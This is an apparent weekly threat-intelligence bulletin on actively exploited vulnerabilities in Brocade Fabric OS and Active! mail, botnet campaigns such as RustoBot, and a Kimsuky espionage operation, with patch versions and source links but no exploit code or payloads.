The cyber threat landscape this week reveals a troubling trend: threat actors are not just uncovering vulnerabilities but actively exploiting both legacy and recent flaws to fuel widespread attacks.  

Trend Micro has confirmed in-the-wild exploitation of a critical stack-based buffer overflow vulnerability in Active! mail 6, a platform widely used in Japanese enterprises. Simultaneously, Brocade Fabric OS remains under active attack, with a privilege escalation flaw giving local users root-level control over core systems.

Botnet activity also surged, as EnemyBot, Sysrv-K, Andoryu, and Androxgh0st ramped up exploitation of known flaws in Cloud Gateway, GitLab, and PHP-based applications. On the IoT front, familiar names like Bashlite, BrickerBot, Tsunami, and Mirai aggressively targeted Eir D1000 modems, rapidly expanding their botnet infrastructure.

In the realm of cyber-espionage, AhnLab Security Intelligence Center (ASEC) attributed a new campaign to Kimsuky, the North Korean state-sponsored group. Tracked as Larva-24005, the operation abuses patched Microsoft vulnerabilities and uses a toolkit that includes RDP exploits and keyloggers.

Rounding off the week, FortiGuard Labs revealed RustoBot, a sophisticated botnet written in Rust, targeting command injection flaws in TOTOLINK and DrayTek routers. The campaign spans regions including Japan, Taiwan, Vietnam, and Mexico, further underlining how router vulnerabilities remain a top vector for mass compromise.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

‍CVE-2025-1976

A Privilege Escalation Vulnerability in the Brocade Fabric OS stems from a flaw in the IP address validation process, allowing a local user with administrative privileges to execute arbitrary code with full root-level access. Assigned a high CVSS Score of 8.6, this vulnerability affects versions 9.1.0 through 9.1.1d6. Successful exploitation of this vulnerability enables attackers to execute any Fabric OS command and potentially modify the operating system, including custom subroutines, leading to full system compromise. Broadcom has addressed the issue in version 9.1.1d7. This vulnerability is currently under active exploitation, making it a critical concern for organizations relying on Brocade Fabric OS for secure storage network operations.

CVE-2025-42599

A Stack-based Buffer Overflow Vulnerability in the Active! mail 6 poses a critical security risk, allowing remote unauthenticated attackers to execute arbitrary code or cause a denial-of-service (DoS) condition by sending specially crafted requests. Rated CVSS 9.8 (Critical), this flaw affects versions 6.60.05008561 and earlier. Exploitation of this vulnerability could enable attackers to take full control of the mail server or disrupt email services entirely. According to Trend Micro, this vulnerability is being actively exploited in the wild as zero-day. To address this vulnerability, Qualitia has released an updated version, 6.60.06008562, which users are strongly advised to apply immediately.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

‍RustoBot Targets TOTOLINK and DrayTek Vulnerabilities

FortiGuard Labs has recently uncovered RustoBot, a sophisticated botnet written in Rust, a memory-safe programming language renowned for its performance and security. This malware campaign targets vulnerabilities in TOTOLINK and DrayTek routers, specifically exploiting known command injection flaws to execute remote code and seize control of affected devices. RustoBot has been observed infiltrating technology infrastructures across multiple regions, including Japan, Taiwan, Vietnam, and Mexico, highlighting the botnet's expanding reach and the critical need for timely patching and robust network defense strategies.
‍
‍CVE-2019-0708 and CVE-2017-11882

AhnLab Security Intelligence Center (ASEC) has identified a new malicious campaign attributed to the North Korean state-sponsored threat group Kimsuky, tracked as Larva-24005. This campaign exploits patched Microsoft flaws, especially critical BlueKeep vulnerability, CVE-2019-0708, and the known Microsoft Equation Editor vulnerability; CVE-2017-11882 to infiltrate into target systems. Once the initial access is gained, the operation deploys a dropper to install malware such as MySpy, which gathers system information, and RDPWrap tool to enable access. The campaign culminates in the use of keyloggers like KimaLogger and RandomQuery to monitor the user activity.  

Active since October 2023, the campaign primarily targets South Korea’s software, energy, and finance sectors, with additional victims across Japan, the U.S., China, Germany, the U.K., Canada, and several other countries in Asia, Europe, Africa, and North America, highlighting the campaign’s broad and strategic global reach.

‍

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://asec.ahnlab.com/en/87554/  
2. https://thehackernews.com/2025/04/kimsuky-exploits-bluekeep-rdp.html  
3. https://www.fortinet.com/blog/threat-research/new-rust-botnet-rustobot-is-routed-via-routers  
4. https://www.jpcert.or.jp/at/2025/at250010.html  
5. https://www.bleepingcomputer.com/news/security/active-mail-rce-flaw-exploited-in-attacks-on-japanese-orgs/  
6. https://www.trendmicro.com/ja_jp/jp-security/25/d/trendnews-20250422-01.html#3